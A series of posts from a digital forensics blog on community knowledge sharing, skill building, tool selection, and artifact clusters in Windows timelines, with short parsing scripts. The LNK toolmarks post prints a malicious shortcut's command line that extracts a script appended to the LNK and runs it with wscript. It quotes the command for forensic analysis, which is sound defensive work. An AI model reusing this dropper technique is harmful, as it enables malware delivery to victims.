Tuesday, December 31, 2019

Maintaining The KnowledgeBase

As 2019 closes, we move into not just a new year, but also a new decade.  While, for the most part, this isn't entirely significant...after all, how different will you really be when you wake up on 2 Jan...times such as this offer an opportunity for reflection, and for addressing those things that we may decide we need to change.

I blogged recently regarding Brett's thoughts on how to go about improving #DFIR skills, and to some extent, expanding on them from my own perspective.  Then this morning, I was perusing one of the social media sites that I frequent, and came across a question regarding forensic analysis of "significant locations" on an iPhone 6. I really have no experience with smart phones or iOS, but I thought it would be interesting to take a quick look, so I did a Google search.  The first result was an article that had been posted on the same social media site a year and a half ago.

I recently engaged with another analyst via social media, regarding recovering Registry hives from unallocated space.  The analyst had specifically asked about FOSS tools, and in relatively short order, I found an 8-page PDF document on the subject, written by Andrew Case.  The document wasn't dated, but it did refer specifically to Windows XP, so that gave me some idea of the time frame as to when Andrew "put pen to paper", as it were.  Interestingly, Andrew's paper made use of one of the FOSS tools the analyst asked about, so it worked out pretty well.
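For those curious about the mechanics, the core of that kind of recovery is simple signature scanning; every Registry hive file begins with a 4-byte "regf" magic value, followed by two sequence numbers that match when the hive was written cleanly.  The sketch below is purely my own illustration of the approach (it is not Andrew's tool, nor the FOSS tool the analyst asked about), and it assumes the extracted unallocated data preserves 4KB cluster alignment; drop the alignment step if that assumption doesn't hold for your extract:

```python
# Minimal sketch of signature-based hive carving: scan raw data
# (e.g., an extract of unallocated space) for the "regf" magic
# that begins every Registry hive base block.
import struct

REGF_MAGIC = b"regf"

def find_hive_offsets(data, chunk=4096):
    """Return (offset, sequence_numbers_match) tuples for each
    plausible hive base block found in the buffer.

    Hive base blocks are written 4096-byte aligned, so only testing
    aligned offsets cuts down on false positives...assuming the
    extraction preserved that alignment.
    """
    hits = []
    for off in range(0, len(data) - 4, chunk):
        if data[off:off + 4] == REGF_MAGIC:
            # The primary and secondary sequence numbers follow the
            # magic; on a cleanly written hive, they are equal.
            seq1, seq2 = struct.unpack_from("<II", data, off + 4)
            hits.append((off, seq1 == seq2))
    return hits
```

From a candidate offset, a carver would then walk the "hbin" blocks that follow to establish the hive's extent; that part is left out here for brevity.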

The industry is populated by the full spectrum of #DFIR folks, from those interested in the topic and enthusiasts, to folks for whom digital analysis work is part of their job but not an everyday thing, all the way through academics and highly dedicated professionals.  There are those who don't "do" DFIR analysis all the time, and those whose primary role is to do nothing but digital analysis and research.

And there's always something new to learn, isn't there?  There's always a question that needs to be answered, such as, "how do I recover an NTUSER.DAT hive from a deleted user profile?"  I would go so far as to say that we all have questions such as these from time to time, and that some of us have the time to research these questions, and others don't.  Some of us find applicable results pretty quickly, and some of us can spend a great deal of time searching for an answer, never finding anything that applies to what we're trying to accomplish.  I know that's happened to me more times than I care to count.

The good news is that, in most cases, the information someone is seeking is out there.  Someone knows it, and someone may have even written it down.  The bad news is...the information is out there.  If you don't have enough experience in the field or topic in question, you're likely going to have difficulty finding what you're looking for.  I get it.  For every time I run a Google search and the first half a dozen responses hit the nail squarely on the head, there are 5 or 6 searches where I've just not found anything of use...not because it doesn't exist but more likely due to my search terms. 

Training can be expensive, and can require the attendee to be out of the office or off the bench for an extended period of time.  And training may very often not cover those things for which we have questions.  For example, throughout the past two decades, I've not only spoken publicly multiple times on the topic of Registry analysis, as well as written and conducted training courses (and even written books on the topic), but it never occurred to me that someone would want to recover the NTUSER.DAT hive from a deleted profile.  And, even though I've asked multiple times over the years for feedback, even posing the question, "...what would you like to see covered/addressed?", not once has the topic of recovering deleted hives come up.

That is, until recently.  Now, we have a need for "just in time training".  The good news is that we have multiple resources available to us...Google, the Forensics Wiki, and Brett's DFIR Training site, to name a few.  The down side is that even searching these sites in particular, you may not find what you're looking for.

So, for the coming year...nay, the coming decade...my request or "call to action" is for folks in the community to take more active steps in a couple of areas.  First, develop purposeful, intentional relationships in the community.  Go beyond following someone on social media, or clicking "Like" or "RT" to everything you see.  Instead, connect with someone because you have a purposeful intention for doing so, and because you're aware of the value that you bring to the relationship.  What this leads to is developing relationships based on trust, and subsequently, the sharing of tribal knowledge.

Second, actively take steps to maintain the knowledgebase.  If you're looking for something, try the established repositories.  If you can't find it there, but you do find an answer, and even if you end up building the answer yourself from bits and pieces, take active steps to ensure that what you found doesn't pass undocumented.  I'll be the first to tell you that I haven't seen everything there is to see...I've never done a BEC investigation.  There are a lot of ransomware infections I've never seen, nor investigated.  My point is that we don't all see everything, but by sharing what we've experienced, we can ensure that more of us can benefit from each other's experiences.  Jim Mattis, former Marine Corps warfighter and general officer, and former Secretary of Defense, stated in his recent book that our "own personal experiences are not broad enough to sustain [us]."  This is 1000% true for warfighters, as well as for threat hunters, and forensic and intel analysts. 

So, for the coming of the new year, resolve to take a more active role not just in learning new things, but adding to the knowledgebase of the community.

Sunday, December 29, 2019

LNK Toolmarks

Matt posted a blog article a while back, and I took interest in large part because it involved an LNK file.  Matt provided a hash for the file in question, as well as a walk-through of his "peeling of the onion", as it were.  However, one of the things that Matt pointed out that still needed to be done was toolmark analysis.

In his article, Matt says that LNK files "...stitch together the world between the attacker and the victim."  He's right.  When an actor sends an LNK file to a target, particularly as an email attachment, they are sharing evidence of their development environment, which can be used to track threat actors and their campaigns.  This is facilitated by the fact that LNK files not only contain a great deal of metadata from the actor's dev environment that acts as "toolmarks", but also by the fact that the absence of portions of that metadata can be considered "toolmarks", as well.

The metadata extracted from the LNK file Matt discussed is illustrated below:

File: d:\cases\lnk\foto
guid               {00021401-0000-0000-c000-000000000046}
mtime              Sat Sep 15 07:28:38 2018 Z
atime              Thu Sep 26 22:40:14 2019 Z
ctime              Sat Sep 15 07:28:38 2018 Z
workingdir         %CD%                          
basepath           C:\Windows\System32\cmd.exe   
shitemidlist       My Computer/C:\/Windows/System32/cmd.exe
**Shell Items Details (times in UTC)**
  C:2018-09-15 06:09:28  M:2019-09-23 17:18:10  A:2019-09-26 22:31:52 Windows  (9)  [526/1]
  C:2018-09-15 06:09:28  M:2019-05-06 20:04:58  A:2019-09-26 22:02:08 System32  (9)  [2246/1]
  C:2018-09-15 07:28:40  M:2018-09-15 07:28:40  A:2019-09-26 22:38:36 cmd.exe  (9)  
vol_sn             D4DA-5010                     
vol_type           Fixed Disk                    
commandline        /c start "" explorer "%cd%\Foto" | powershell -NonInteractive -noLogo -c "& {get-content %cd%\Foto.lnk | select -Last 1 > %appdata%\_.vbe}" && start "" wscript //B "%appdata%\_.vbe"
iconfilename       C:\Windows\System32\shell32.dll
hotkey             0x0                             
showcmd            0x7                             

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasExpIcon|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath

As you can see, we have a good bit of what we'd expect to see in an LNK file, but there are also elements clearly absent, items we'd expect to see that just aren't there.  For example, there are no Extra Data Blocks (confirmed by visual inspection), and as such, no MAC address, no machine ID (or NetBIOS name), etc.  These missing pieces can be viewed as toolmarks, and we've seen where code executed by an LNK file has been appended to the end of the LNK file itself. 
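For reference, many of the header-level items in the listing above (the MAC times, showcmd, hotkey, and the LinkFlags) live in the fixed 76-byte ShellLinkHeader described in Microsoft's MS-SHLLINK specification, and can be pulled with just a few lines of code.  The sketch below is purely illustrative...it is not the tool that produced the output above, and it only decodes a subset of the defined flag bits:

```python
# Minimal sketch of parsing "toolmark" fields from the 76-byte
# ShellLinkHeader at the start of an LNK file (per MS-SHLLINK).
import struct
from datetime import datetime, timedelta, timezone

# Subset of the defined LinkFlags bits
LINK_FLAGS = {
    0x00000001: "HasLinkTargetIDList",
    0x00000002: "HasLinkInfo",
    0x00000004: "HasName",
    0x00000008: "HasRelativePath",
    0x00000010: "HasWorkingDir",
    0x00000020: "HasArguments",
    0x00000040: "HasIconLocation",
    0x00000080: "IsUnicode",
    0x00004000: "HasExpIcon",
}

def filetime_to_utc(ft):
    # FILETIME: 100-nanosecond intervals since 1601-01-01 UTC
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_lnk_header(buf):
    hdr_size, = struct.unpack_from("<I", buf, 0)
    assert hdr_size == 0x4C, "not a shell link header"
    flags, attrs = struct.unpack_from("<II", buf, 20)
    ctime, atime, mtime = struct.unpack_from("<QQQ", buf, 28)
    showcmd, = struct.unpack_from("<I", buf, 60)
    hotkey, = struct.unpack_from("<H", buf, 64)
    return {
        "flags": [name for bit, name in LINK_FLAGS.items() if flags & bit],
        "ctime": filetime_to_utc(ctime),
        "atime": filetime_to_utc(atime),
        "mtime": filetime_to_utc(mtime),
        "showcmd": showcmd,
        "hotkey": hotkey,
    }
```

The shell item ID list, LinkInfo block (where the volume serial number lives), and any Extra Data Blocks follow the header; their presence, absence, and contents are where much of the toolmark value lies.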

While this particular LNK file is missing a good bit of what we would expect to see, based on the file format, there is still a good bit of information available that can be used to develop a better intel picture.  For example, the volume serial number is intact, and that can be used in a VirusTotal retro-hunt to locate other, perhaps similar LNK files.  This would then give some insight into how often this particular technique (and dev system) seems to be in use and in play, and if the VirusTotal page for each file found contains some information about the campaign in which it was seen, that might also be helpful.

What something like this illustrates is the need for tying DFIR work much closer to CTI, and even EDR/MSS.  Some organizations still have these functions as separate business units, and this is particularly true within consulting organizations.  In such instances, CTI resources do not have the benefit of accessing DFIR information (and to some extent, vice versa), minimizing the view into incidents and campaigns.  Having the ability to fully exploit DFIR data, such as LNK files, and incorporating that information into CTI reporting produces a much richer picture, as evidenced by this FireEye write-up regarding Cozy Bear.

Saturday, December 28, 2019

Improving DFIR Skills

There are more than a few skills that make up the #DFIR "field", and just one of them is conducting DFIR analysis.  Brett Shavers recently shared his thoughts on how to improve in this area, specifically by studying someone else's case work.  In his article, Brett lists a number of different avenues for reviewing work conducted by others as a means of improving your own skills.

Brett and I are both Marine veterans, and Marines have a long history of looking to the experience of others to expand, extend, and improve our own capabilities.  In the case of war fighting, a great deal has been written, providing a wealth of information to dig into and study.  Jim Mattis stated in his book, "Call Sign Chaos", that "...your personal experiences alone are not broad enough to sustain you."  This is true not only for a Marine general, but also for a DFIR analyst.  In fact, I would say even more so for an analyst.

Okay, so how do we apply this?  One way is to follow Brett's advice, and seek out resources.  There are numerous web sites available, and another resource is David Cowen's book, Computer Forensics InfoSec Pro Guide.

Another available resource is Investigating Windows Systems.  What makes this book different from others that you might find is that when writing it, my goal was to demonstrate stitching together the analysis process, by explaining why certain decisions were made, and how the data and thought processes led to various findings.  Rather than simply presenting a finding, I wanted to illustrate the data that was laid out before me when I made each of the analysis decisions.  As with all of my other books, I wrote IWS in large part due to the fact that I couldn't find any book (or other resource) that took this approach.

Another approach is participating in CTFs.  However, if you don't feel confident in participating in the actual CTF itself, but still want to take a shot at the analysis and see how others went about answering the challenge questions, there are often options available.  In 2018, DefCon had a forensic analysis CTF, and a bit after the conference, several (I found 3) folks posted their take on the challenges.

My "thing" with CTFs is that they very often aren't 'real world'.  For example, in all of my time as an incident responder, I've never had someone ask me to identify a disk signature or volume serial number from an acquired image.  Can I?  Sure.  But it's never been part of the analysis process, in providing services to a customer.  As such, I posted something of my own take on a few of the questions (here, and here), so they're available for anyone to read, and because the images are available, anyone can walk through what I or the other folks did, following along using their own tools and their own analysis processes.

If you do decide to engage in developing your skills, one of the best ways to do so is when you have someone to help you get over the humps.  I'll admit it...sometimes, I take time to research something and may come up with a solution that isn't at all elegant, and could perhaps be done better.  Or maybe, due to the fact that I'm relying on my own experiences, I don't see or consider something that to someone else, is obvious.  Having a mentor, someone you can go to with questions and bounce ideas off of can be very beneficial in both the long and short term.

Wednesday, December 25, 2019

What is "best"?

A lot of times I'll see a question in DFIR-related social media, along the lines of, "what is the best tool to do X?"  I've seen this a couple of times recently, perhaps the most recent being, "what is the best carving tool?"  Nothing was stated with respect to what was being carved (files, records, etc.), what the operating or file system in question was, etc. Just, "what is the best tool?"

I was recently searching online for a tire inflator.  I live on a farm, and have a couple of tractors, a truck, and a horse trailer.  I don't need a fully-functional air compressor, but I do need something portable and manageable for inflating tires, something both my wife and I can use not only around the farm, but also when we're on the road.  As I began looking around at product reviews, I also started seeing those "best of" lists, where someone (marketing firm, editorial board, etc.) compiled a list of what they determined to be the "best" available of a particular product.

Understand that I have a pretty good idea of what I'm looking for, particularly with respect to features.  I'm looking for something that can plug into the cigarette lighter in the truck or car, or into another power source, such as "house power" or a portable generator.  I'm looking for something that can fill a tire to at least 100 psi (some of my tires run at 12 psi, others at 90 psi), but I'm not super-concerned about the speed; my primary focus is ease of use and durability.  Being able to set the desired pressure and have it auto-stop would be very useful, but it's not a show-stopper.

Some of the inflators listed as "best" had to be connected directly to the vehicle battery.  Yeah, I know...right?  Not particularly convenient if my wife needs to add pressure to a tire, particularly when plugging into the cigarette lighter is much more convenient.  I mean, really...how "convenient" is it to pull over to the side of the road and have someone who has never even used jumper cables to jump-start another vehicle connect an inflator to battery terminals?  Some inflators not listed as "best" were considered to be "too expensive" (although no threshold for cost was provided as a basis for testing), and looking a bit more closely, those inflators allowed the user to connect to different power sources.  Okay, so that sort of makes sense, but rather than saying that the product is "too expensive", maybe list why.  Another was described as "too heavy", although it weighed just 5 lbs (as opposed to the "best", which came in at just over 3 lbs).

Bringing this back to #DFIR, I ran across this article the other day, which reportedly provides a list of the "top 10 digital forensics consulting/services companies".  A list of the companies is provided on the page, with a brief description of what each company does, but what really stood out for me is that the list is compiled by "a distinguished panel of prominent marketing specialists".  This, of course, raises the question as to the criteria used to determine which companies were reviewed, and of those, which made the top 10.

In 2012, I attended a conference presentation where the speaker made comments about various tools, including RegRipper.  One comment was, "RegRipper doesn't detect...", and that wasn't necessarily true.  RegRipper was released in 2008 with the intention of being a community-driven tool.  However, only a few have stepped up over the years to write and contribute plugins.  RegRipper is capable of detecting a great deal (null bytes in key/value names, RLO char, etc.), and if your installation of RegRipper "doesn't detect" something, it's likely that (a) you haven't written the plugin, or (b) you haven't asked someone for help writing the plugin.

During that same presentation, the statement was made that "RegRipper does not scale to the enterprise".  This is true.  It is also true that it was never designed to do so.  The use case for which RegRipper was written is still in active use today.

My point is simply this..."best" is relative.  If you're asking the question (i.e., "..what is the best #DFIR tool to do X?"), then understand that, if you don't share your requirements, what you're going to get back is what's best for the respondent, if anything.  No one wants to write an encyclopedia of all of the different approaches, and available tools.  Although, I'm sure someone will be happy to link you to one.  ;-) 

When you're considering the best "tool", take a look at the process, and maybe consider the best approach. Sometimes it's not about the tool.  Also, consider what it is you're trying to accomplish (your goals), as well as other considerations, such as operating or file system, etc.  If you're not comfortable with the command line, or would perhaps like to consider a GUI solution (because doing so makes for a good screen capture in a report), or if you require the use of a commercial (vs FOSS...some do) tool, be sure to take those details into consideration, and if you're asking a question online, share them, as well.




Tuesday, December 03, 2019

Artifact Clusters

Very often within the DFIR community, we see information shared (usually via blog posts) regarding a "new" artifact that has been recently unearthed, or simply being addressed for the first time.  In some cases, the artifact is new to us, and in others, it may be the result of some new feature added to the Windows operating system or to an application.  Sometimes when we see this new artifact discussed, a tool is shared to parse and make sense of the data afforded by that artifact.  In some cases, we may find that multiple tools are available for parsing the same artifact, which is great, because it shows interest and diversity in the approach to accessing and making use of the data.

However, what we don't often see is how that artifact relates to other artifacts from the same system.  Another way to look at it is, we don't often see how the tool, or more importantly, the data available in the source, can serve us to further an investigation. We may be left thinking, "Great, there's this data source, and a tool that allows me to extract and make some sense of the data within it, but how do I use it as part of an investigation?"


I shared an initial example of what this might look like in a recent blog post, and this was also the approach I took when I wrote about the investigations in Investigating Windows Systems. I hadn't seen any books available that covered the topic of digital forensic analysis (as opposed to just parsing data) from an investigation-wide perspective, completing an investigation using multiple artifacts to "tell the story".  The idea was (and still is) that a single artifact, or a single entry derived from a data source, does NOT tell the whole story of the investigation.  A single artifact may be a high fidelity indicator that provides a starting point for an investigation, but it does not tell the whole story. Rather than a single artifact, analysts should be looking at artifact clusters to provide the necessary context for an analyst to make a finding as to what happened.

Artifact clusters provide two things to the investigator: validation and context.  Artifact clusters provide validation by reinforcing that an event occurred, or that the user took some action.  That validation may be a duplicate event; in my previous blog post, we see the following events in our timeline:

Wed Nov 20 20:09:28 2019 Z
  TIMELINE                   - Start Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE 
  REG                        - [Program Execution] UserAssist - {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Microsoft Office\Office14\WINWORD.EXE (5)

What we see here (above) are duplicate events that provide validation.  We see via the UserAssist data that the user launched WinWord.exe, and we also see validation from the user's Activity Timeline database.  Not only do we have validation, but we can also see what the artifact cluster should look like, and as such, have an understanding of what to look for in the face of anti-forensics efforts, be they intentional or the result of natural evidence decay.

In other instances, validation may come in the form of supporting events.  For example, again from my previous blog post, we see the following two events side-by-side in the timeline:

Wed Nov 20 22:50:02 2019 Z
  REG                        - RegEdit LastKey value -> Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\TaskFlow
  TIMELINE                   - End Time:Windows\regedit.exe 

In this example, we see that the user closed the Registry Editor, and that the user's LastKey value was set, illustrating the key that was in focus when the Registry Editor was closed.  Rather than being duplicate events, these two events support each other.

Looking at different event sources during the same time period also helps us see the context of the events, as we get a better view of the overall artifact cluster.  For example, consider the above timeline entries that pertain to the Registry Editor.  With just the data from the Registry, we can see when the Registry Editor was closed, and the key that was in focus when it was closed.  But that's about all we know. 

However, if we add some more of the events from the overall artifact cluster, we can see not just when, but how the Registry Editor was opened, as illustrated below:

Wed Nov 20 22:49:11 2019 Z
  TIMELINE                   - Start Time:Windows\regedit.exe 

Wed Nov 20 22:49:07 2019 Z
  REG                        - [Program Execution] UserAssist - {F38BF404-1D43-42F2-9305-67DE0B28FC23}\regedit.exe (1)
  REG                        - [Program Execution] UserAssist - {0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Administrative Tools\Registry Editor.lnk (1)

From a more complete artifact cluster, we can see that the user had the Registry Editor open for approximately 51 seconds.  Information such as this can provide a great deal of context to an investigation.
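The grouping itself is straightforward to automate; once events from all of your data sources are normalized to a common timestamp, anything falling within a short window of its neighbors can be treated as a candidate cluster for the analyst to review.  The sketch below is purely illustrative...the simplified (time, source, description) tuples are my own, not any particular tool's timeline format:

```python
# Minimal sketch of grouping normalized timeline events (epoch
# seconds) from multiple sources into candidate artifact clusters.

def cluster_events(events, window=60):
    """Group time-sorted events into clusters; a gap larger than
    `window` seconds between consecutive events starts a new cluster."""
    events = sorted(events, key=lambda e: e[0])
    clusters, current = [], []
    for ev in events:
        if current and ev[0] - current[-1][0] > window:
            clusters.append(current)
            current = []
        current.append(ev)
    if current:
        clusters.append(current)
    return clusters
```

Run against the Registry Editor events above, the UserAssist and Activity Timeline entries at 22:49 and the LastKey/End Time entries at 22:50 would fall into a single cluster, reflecting that ~51-second session.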

Evidence Oxidation
Artifact clusters give us a view into the data in the face of anti-forensics, either as dedicated, intentional, targeted efforts to remove artifacts, or as natural evidence decay or oxidation.

Wait...what?  "Evidence oxidation"?  What is that?  I shared some DFIR thoughts on Twitter not long ago on this topic, and in short, what this refers to is the natural disappearance of items from artifact clusters due to the passage of time, as some of those artifacts are removed or overwritten as the system continues to function. This is markedly different from the purposeful removal of artifacts, such as Registry keys being specifically and intentionally modified or deleted.

This idea of "evidence decay" or "evidence oxidation" begins with the Order of Volatility, which lists different artifacts based on their "lifetime"; that is to say that different artifacts age out or expire at different rates.  For example, a process executed in memory will complete (often within seconds, or sooner) and the memory used by that process will be freed for use by another process in fairly short order.  That process may result in the operating system or application generating an entry into a log file, which itself may roll over or be overwritten at various rates (i.e., the entry itself is overwritten as newer entries are added), depending upon the logging mechanism.  Or, a file may be created within the file system that exists until someone...a person...purposefully deletes it.  Even then, the contents of the file may exist (NTFS resident file, etc.) for a time after the file is marked as "not in use", something that may be dependent upon the file system in use, the level of activity on the system, whether a backup mechanism (backup, Volume Shadow Copy, etc.) occurred between the file creation and deletion times, etc.

In short, some artifacts may have the life span of a snowflake, or a fruit fly, or a tortoise.  The life span of an artifact can depend upon a great deal; the operating system (and version) employed, the file system structure, the auditing infrastructure, the volume of usage of the system, etc.  Consider this...I was once looking at a USN Change Journal from an image acquired from a Windows 7 system, and the time span of the available data was maybe a day and a half.  Right around that time, a friend of mine contacted me about a Windows 2003 system he was examining, for which the USN Change Journal contained 90 days worth of data.

Windows systems can be very active, even when they appear to be sitting idle with no one actively typing at the keyboard.  The operating system itself may reach out for updates, during which files are downloaded, processes are executed, and files are deleted.  The same is true for a number of applications. Once a user becomes active on the system, the volume of activity and changes may increase dramatically.  I use several applications (Notepad++, UltraEdit, VirtualBox, etc.) that all reach out to the Internet to look for updates when they're launched.  Just surfing the web causes browser history to be generated and cached.